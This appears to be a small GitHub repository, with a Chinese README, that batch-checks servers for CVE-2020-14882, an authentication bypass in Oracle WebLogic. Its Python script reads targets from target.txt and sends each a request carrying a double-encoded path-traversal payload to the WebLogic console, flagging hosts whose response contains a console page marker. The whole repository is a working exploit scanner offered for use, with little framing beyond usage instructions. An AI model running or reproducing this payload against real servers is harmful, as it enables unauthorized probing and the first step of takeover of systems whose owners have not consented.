├── target.txt
├── demo.png
├── README.md
└── CVE-2020-14882.py


/target.txt:
--------------------------------------------------------------------------------
1 | ip:port
2 | x.x.x.x:xx
3 | 


--------------------------------------------------------------------------------
/demo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GGyao/CVE-2020-14882_POC/HEAD/demo.png


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2020-14882批量验证 #
 2 | 
 3 | ## 使用 ##
 4 | 
 5 | python3 CVE-2020-14882.py 
 6 | 
 7 | (将目标放入target.txt中，一行一个)
 8 | 
 9 | 
10 | ## 示例 ##
11 | 
12 | ![](demo.png)
13 | 


--------------------------------------------------------------------------------
/CVE-2020-14882.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | 
 3 | requests.packages.urllib3.disable_warnings()
 4 | headers_wls_1213 = {
 5 |  'User-Agent':'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
 6 |  'Content-Type':'text/xml'
 7 | }
 8 | 
 9 | 
10 | 
11 | def main():
12 |  for target in open("target.txt"):
13 |   target = target.strip()
14 |   url = "http://" + target + '/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=java.lang.String("ahihi")'
15 |   try:
16 | 
17 |    bypass_1 = requests.get(url, headers = headers_wls_1213,timeout = 3, verify = False)
18 |    if "quicklinksrowout" in bypass_1.text:
19 |     print ("[+] " + target + " is vulnerable!")
20 |    else:
21 |     print ("[-] " + target + " is not vulnerable!")
22 |   except Exception as e:
23 |    pass
24 | 
25 | if __name__=="__main__":
26 |  main()
27 | 
28 | 


--------------------------------------------------------------------------------